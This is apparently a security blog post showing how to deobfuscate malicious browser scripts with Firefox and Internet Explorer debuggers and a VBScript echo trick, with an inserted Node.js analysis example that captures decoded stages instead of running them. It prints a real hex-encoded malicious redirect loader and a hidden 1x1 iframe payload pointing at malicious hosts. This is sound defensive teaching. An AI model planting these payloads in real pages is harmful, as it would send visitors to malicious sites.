Takaaki Mori

How to deobfuscate malicious browser scripts using a script debugger

Blog post created by Takaaki Mori (Employee) on Dec 31, 2016

<Mozilla>

1. Edit sample.html to add the debugger; statement at the beginning of the script.

2. Load sample.html into Firefox using the browser's File menu.

3. Use Firebug to set a breakpoint on the eval(txt); line of the script.

4. Look at the contents of the variable txt by typing the console.log(txt) command in Firebug's Console tab.

5. Examine the deobfuscated script in the Console tab.


--- sample.html ---

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="#KEYWORDS#" />
<link rel="copyright" href="http://www.gnu.org/copyleft/fdl.html" />
<title>...Berlin with the appointed export lotus notes address book of...</title>
<script>

debugger;
var arr = "76617220726566203d20646f63756d656e742e72656665727265723b0d0a766172206c6f63203d20646f63756d656e742e6c6f636174696f6e2e687265663b0d0a696620287265662e696e6465784f662822676f6f676c652229203d3d202d31202626207265662e696e6465784f6628227961686f6f2229203d3d202d31202626207265662e696e6465784f6628226d736e2229203d3d202d3129207b0d0a09646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a7d20656c7365207b0d0a09696620287265662e696e6465784f662822736974653a2229203e3d2030207c7c207265662e696e6465784f662822736974652533412229203e3d203029207b0d0a0909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a097d20656c7365207b0d0a0909766172207265203d206e6577205265674578702822687474703a5c2f5c2f285b612d7a302d395c2d412d5a5c2e5d2a295c2f22293b0d0a090976617220646f6d61696e203d2072652e65786563286c6f63293b0d0a090969662028646f6d61696e203d3d206e756c6c29207b0d0a090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a09097d20656c7365207b0d0a0909097265203d206e65772052656745787028225c5c2e285b612d7a302d395c2d412d5a5c2e5d2a2922293b0d0a090909746f70646f6d61696e203d2072652e6578656328646f6d61696e5b315d293b0d0a090909696620287265662e696e6465784f6628646f6d61696e5b315d2920213d202d31207c7c207265662e696e6465784f6628746f70646f6d61696e5b315d2920213d202d3129207b0d0a09090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a0909097d20656c7365207b0d0a090909097265203d206e6577205265674578702822713d5b5e265d2a22293b0d0a09090909766172206d203d2072652e6578656328726566293b0d0a09090909696620286d203d3d206e756c6c29207b0d0a09090909097265203d206e6577205265674578702822703d5b5e265d2a22293b0d0a09090909096d203d2072652e6578656328726566293b0d0a0909090909696620286d203d3d206e756c6c29207b0d0a090909090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f61637469766566726565686f73742e636f6d2f72656d6f7665642e7068703f75726c3d22202b206c6f633b0d0a09090909097d20656c7365207b0d0a0909090909097661722071203d206d5b305d2e737562737472696e672832293b0d0a09090909090971203d20712e7265706c616365282f5c2b2f2c20225f22293b0d0a09090909090971203d20712e7265706c616365282f5c732f2c20225f22293b0d0a090909090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f73747570686f6d652e636f6d2f702f22202b2071202b20222e68746d6c223b0d0a09090909097d0d0a090909097d20656c7365207b0d0a09090909097661722071203d206d5b305d2e737562737472696e672832293b0d0a090909090971203d20712e7265706c616365282f5c2b2f2c20225f22293b0d0a090909090971203d20712e7265706c616365282f5c732f2c20225f22293b0d0a0909090909646f63756d656e742e6c6f636174696f6e2e68726566203d2022687474703a2f2f73747570686f6d652e636f6d2f702f22202b2071202b20222e68746d6c223b0d0a090909097d0d0a0909097d0d0a09097d0d0a097d0d0a7d0d0a";

var table = new Array();table['0'] = 0;table['1'] = 1;table['2'] = 2;table['3'] = 3;table['4'] = 4;table['5'] = 5;table['6'] = 6;table['7'] = 7;table['8'] = 8;table['9'] = 9;table['a'] = 10;table['b'] = 11;table['c'] = 12;table['d'] = 13;table['e'] = 14;table['f'] = 15;
function markCounter(a) {
    var txt = ""; var c = 0;
    // two hex digits of arr become one character of the hidden script
    while (c < a.length) {txt += String.fromCharCode(table[a[c]] * 16 + table[a[c + 1]]); c += 2;}
    eval(txt);    // step 3: set the breakpoint on this line
}

(The rest of sample.html is not reproduced in the post.)


The deobfuscated script contains the URL A***freehost.com, which is probably malicious.

---------------------------------------------------------------------------------------------------------------------------------------------------------

<IE>


  1. Edit sample.html in Notepad++ to insert the "debugger;" statement at the beginning of its script.
  2. Open sample.html in Internet Explorer and activate the debugger in Developer Tools.
  3. Reload the script in Internet Explorer to activate the debugger.
  4. Set a breakpoint using the Internet Explorer debugger on the third instance of document.write.
  5. Run the script in the Internet Explorer debugger to deobfuscate its contents and reach the breakpoint.
  6. Copy the contents of the variable G82B54 to the clipboard and paste them into Notepad++.
  7. Examine the deobfuscated script in Notepad++, and then exit Internet Explorer and the text editor.


The contents of G82B54 at the breakpoint:

G82B54 = "</textarea><iframe src=\"http://66.109.***.198/c76c1d2643c69857e1a677d2e0f23f8e/b1fd046f3c05b517d106b003853b1441?p=ftp\" width=1 height=1 style=\"border: 0px\"></iframe>"

The iframe URL is a malicious site.
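The following is an added example written for this post; it is not code from the post or from the sample's author. It models, offline in Node.js, what the Firefox steps (breakpoint on eval(txt)) and the Internet Explorer steps (breakpoint on document.write, variable G82B54) recover: stage 1 is a hex blob, the loader decodes it and hands the result to eval, and the decoded stage may call document.write. Instead of pausing in a debugger, both sinks are replaced with capture functions, so every decoded stage and every write is recorded and nothing is executed for real. The hex payload is constructed for this example and points at the placeholder domain example.invalid rather than the post's real indicators; the names hexToText, textToHex, runWithCapturedSinks, extractUrls and analyze are chosen for this example.

```javascript
// Added example (not code from the original post or from the sample's author).
// Models the loader in sample.html offline in Node.js: stage 1 is a hex blob,
// the loader decodes it and hands the result to eval(), and the decoded stage
// may in turn call document.write(). Both sinks are replaced with capture
// functions, so every stage is recorded and never executed for real.

// Two hex digits -> one character; the same mapping as the sample's `table`
// lookup and markCounter() loop, with input validation the loader lacks.
function hexToText(hex) {
  if (hex.length % 2 !== 0 || /[^0-9a-fA-F]/.test(hex)) {
    throw new Error("input is not an even-length hex string");
  }
  let txt = "";
  for (let c = 0; c < hex.length; c += 2) {
    txt += String.fromCharCode(parseInt(hex.slice(c, c + 2), 16));
  }
  return txt;
}

// Inverse of hexToText; used only to build the constructed sample below.
function textToHex(text) {
  let hex = "";
  for (let i = 0; i < text.length; i++) {
    hex += text.charCodeAt(i).toString(16).padStart(2, "0");
  }
  return hex;
}

// Run a decoded stage with instrumented sinks. `eval` and `document` are
// passed in as parameters, so the stage's eval(...) and document.write(...)
// calls resolve to the local capture functions instead of the real ones
// (a parameter named eval is legal in the non-strict code that new Function
// produces). Strings handed to eval are treated as the next stage and
// unwrapped recursively, with a depth limit so a self-referencing loader
// cannot spin forever.
function runWithCapturedSinks(stageSource, captured, depth) {
  captured = captured || { stages: [], writes: [] };
  depth = depth || 0;
  if (depth > 8) {
    throw new Error("more than 8 nested stages; stopping");
  }
  captured.stages.push(stageSource);
  const fakeDocument = {
    write: (s) => { captured.writes.push(String(s)); },
    // constructed placeholder values for properties the sample inspects
    referrer: "",
    location: { href: "http://example.invalid/" },
  };
  const fakeEval = (s) => runWithCapturedSinks(String(s), captured, depth + 1);
  new Function("eval", "document", stageSource)(fakeEval, fakeDocument);
  return captured;
}

// Pull http(s) URLs out of text: the indicators an analyst is after.
function extractUrls(text) {
  const found = text.match(/https?:\/\/[^\s"'<>\\]+/g);
  return found ? Array.from(new Set(found)) : [];
}

// Decode the blob exactly as the loader would, then run the result against
// the captured sinks and report every stage, every write and every URL.
function analyze(hex) {
  const decoded = hexToText(hex);
  const captured = runWithCapturedSinks(decoded);
  const urls = extractUrls(captured.stages.concat(captured.writes).join("\n"));
  return { decoded: decoded, stages: captured.stages, writes: captured.writes, urls: urls };
}

// Constructed two-stage sample with a harmless placeholder domain; it mirrors
// the post's pattern (hex -> eval -> document.write of a 1x1 iframe) but is
// not the post's real payload.
const STAGE2 = 'document.write("<iframe src=\\"http://example.invalid/landing\\" width=1 height=1></iframe>");';
const STAGE1 = "var ref = document.referrer;\neval(" + JSON.stringify(STAGE2) + ");";
const CONSTRUCTED_HEX = textToHex(STAGE1);

const report = analyze(CONSTRUCTED_HEX);
report.stages.forEach((s, i) => console.log("--- stage " + (i + 1) + " ---\n" + s));
console.log("--- document.write arguments ---\n" + report.writes.join("\n"));
console.log("--- URLs ---\n" + report.urls.join("\n"));
```

Run it with node: each decoded stage and each document.write argument is printed, and extractUrls pulls out the indicators, which is where the post's own analysis ends (the a***freehost.com and 66.109.***.198 URLs). Decoding without executing is the same idea the VBScript section applies by redefining the execute function to echo its argument.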


---------------------------------------------------------------------------------------------------------------------------------------------------------

<VBScript>

Using the Cscript Interpreter

1. Right-click vbscript.vbs and select Edit with Notepad++. Add the following code at the beginning of the file, redefining the execute function so that instead of executing its argument it echoes it:

Function execute(x)
    WScript.Echo(x)
End Function

2. Run the script with cscript, redirecting its output to a file:

cscript vbscript.vbs > out.txt

3. Read out.txt to examine the deobfuscated script.

The 1390***.cn URL is a malicious site.